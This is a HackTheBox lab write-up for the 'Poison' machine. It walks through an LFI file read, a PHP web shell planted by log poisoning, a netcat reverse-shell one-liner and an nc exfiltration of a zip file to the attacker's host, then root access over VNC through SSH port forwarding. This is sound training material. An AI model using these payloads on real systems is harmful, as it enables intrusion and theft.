Poison HackTheBox WalkThrough
This is Poison HackTheBox machine walkthrough and is also the
20th machine of our
OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to
Poison HTB machine in two different ways. Before starting let us know something about this machine. It is a
FreeBSD box with IP address
10.10.10.84 and difficulty
medium assigned by its maker.
This machine is currently
retired so you will require
VIP subscription at hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Poison machine by pinging IP 10.10.10.84. If all goes correct then start hacking. As usual I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-
$ sudo nmap -sC -sV -oA nmap/Poison 10.10.10.84
$ cat nmap/Poison.nmap
Nmap found ports 22 and 80 as open.
OpenSSH on pot
Apache2 webserver on port
80 are running. Enumeration on port 22 is useless here because
OpenSSH 7.2 has not much vulnerability that can give us some information to help in further enumeration. So I began my enumeration from port 80. Also, port 80 has more attack surface to enumerate on than port 22. Ongoing to URL http://10.10.10.84/ found a website made entirely from HTML and php.
There are many php scripts given. After entering
listfiles.php script into
Scriptname field and submitting I found an array that contains many number of files. This array also contains a file
When I accessed this file using the URL view source:http://10.10.10.84/browse.php?file=pwdbackup.txt it contains some
base64 encoded characters along with a message it is encoded at least 13 times.
When I tried to decode it I got a password. To decode it, firstly copy whole encoded password in a file and then decode it 13 times.
$ nano encoded-passwd
$ base64 -d encoded-passwd | base64 -d | base64 -d | base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d
After decoding I got password
Charix!2#4%6&8(0. Didn’t know whose password it is. We would try this password to login into SSH when we get some username. After some enumeration I got
vulnerability at URL http://10.10.10.84/browse.php?file=/etc/passwd. For more clear view check it’s source code as it is given in the screenshot. The
passwd file revealed two users
charix have shell. When I tried to SSH into charix account using the decoded credential I could easily logged in. So here our credential is
Let us SSH into charix’s account.
Getting User Shell via SSH ~ Method 1
$ ssh [email protected]
% whoami && id
We have successfully got user shell. Let us capture user flag.
Capture User Flag
% cat user.txt
Getting User Shell via Log Poisoning ~ Method 2
We have successfully got
user flag. I am also going to get shell in other way and that one is probably the intended way. That is, by
Log Poisoning and I think this is the reason the name of the Box is
Poison. Before going further we should know what is log poisoning? So, when an attacker get LFI vulnerability he tries to upgrade it to
RCE so that this attack can be more successful. For this he uses multiple techniques to get RCE and log poisoning is one of them. In Log poisoning an attacker attempts to inject malicious input to the server log and tries to access the log file via LFI vulnerability.
log file contains information of
User-Agent and only user-agent header can be controlled by an attacker so he tries to replace the user-agent with his own
php code as shown in below Request (this request is from http://10.10.10.84 ) . After sending the request when he checks log file he will find output of that code in it. For more info on
LFI to RCE check this link.
We can access log file of Poison Web Server at URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log. As you can see our php code is executed and
hello is printed in the log.
Now let us include a
cmd variable in our php code through which we can execute
OS command to get Reverse Shell. Replace
User-Agent with the following php code.
<?php system($_GET['cmd']) ?> and forward the request from the Repeater.
We can access URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id in browser to execute OS command. Simply replace
id with required OS command and you will get its result at the bottom of this page. We can confirm this by the result of
$id command at the bottom.
We have successfully confirmed
RCE via log poisoning. To get reverse shell start
netcat listener on your kali machine in one window and execute the following URL either in web browser or open it through
$curl command as shown below.
Getting Reverse Shell
$ nc -nvlp 1234
$ whoami && id
$ curl http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.16%201234%20%3E/tmp/f
We have successfully got user shell. So this was the intended way to get into the box. Now exit this shell and login into SSH using creds
Charix!2#4%6&8(0 to get privilege escalation.
To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege to root.
Finding PrivEsc Vector
At some initial enumeration I got a
secret.zip file inside
charix home directory. Then copied this file to my Kali machine so that I could
unzip it and analyze its content. When I tried to extract this file it asked for password then entered
Charix!2#4%6&8(0 and it extracted successfully. After extraction got a file
secret. It is an
extended-ASCII file. On checking its content with
$cat it shows some unreadable characters. Didn’t know exactly what is use of this file. We will check this file later and would see where we will need this file.
Copying File locally to Kali Machine
% cat secret.zip | nc 10.10.14.16 1234 #On Poison Machine
$ nc -l -p 1234 > secret.zip < /dev/null #On Kali Machine
$ unzip secret.zip
LISTENING port on Poison machine I found port
5901 are running locally. After some googling found 5801 & 5901 are
VNC ports, for remote desktop access.
% netstat -an | grep "LISTEN"
Xvnc process is running using
$ps command. Xvnc is a VNC server. This VNC server is running using root privilege. So here our potential PrivEsc vector can be using VNC.
% ps -aux | grep vnc
Since VNC connect to
GUI Desktop so it is not possible to get GUI VNC shell through terminal. We have to
local port forward port 5901 to our Kali machine to use VNC shell.
Local Port Forwarding
$ ssh -L 5901:127.0.0.1:5901 [email protected] # To perform Local Port Forwarding
$ ss -lnpt # Check listening port on your Kali machine
When I tried to connect to
$vncviewer using the
secret file at port 5901 it opened a
VNC Desktop as you can see in the screenshot and that too with root user access. So we have successfully escalated the privilege to root. Let us capture root flag.
$ vncviewer -passwd secret 127.0.0.1:5901
Capture root Flag
# cat root.txt
This was how I rooted to Poison HackTheBox machine. Hope you have learnt something new from this machine walkthrough. Thanks for reading this article. For any query and suggestion related to walkthrough feel free to write us at [email protected].